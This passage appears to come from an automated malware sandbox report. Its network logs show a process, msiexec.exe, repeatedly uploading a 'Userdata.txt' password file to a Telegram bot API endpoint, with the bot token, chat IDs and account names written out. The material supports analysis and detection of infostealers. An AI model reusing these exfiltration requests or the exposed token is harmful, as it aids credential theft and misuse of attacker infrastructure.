                                                                                                            2024-11-25 12:47:53 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 64 39 64 65 39 65 65 64 66 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0d9de9eedfb2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:47:53 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:47:53 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:47:53 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":641,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.949909149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:56 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0dc438f2f66d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:56 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 64 63 34 33 38 66 32 66 36 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0dc438f2f66dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:47:57 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:47:56 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:47:57 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":642,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.949921149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:59 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0dea4ec4d08d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:59 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 64 65 61 34 65 63 34 64 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0dea4ec4d08dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:00 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 577
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:00 UTC577INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":643,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.949929149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:03 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0e1435d6b8b6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:03 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 31 34 33 35 64 36 62 38 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0e1435d6b8b6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:04 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:04 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 577
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:04 UTC577INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":644,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.949940149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:07 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0e387c56ffd5
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:07 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 33 38 37 63 35 36 66 66 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0e387c56ffd5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:07 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:07 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:07 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":645,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.949947149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:10 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0e5c8ddae85b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:10 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 35 63 38 64 64 61 65 38 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0e5c8ddae85bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:10 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:10 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":646,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.949958149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:13 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0e7f163530dd
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:48:13 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 65 37 66 31 36 33 35 33 30 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0e7f163530ddContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:48:14 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:48:14 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:48:14 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":647,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.949966149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:48:16 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0ea2bd3f0271
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
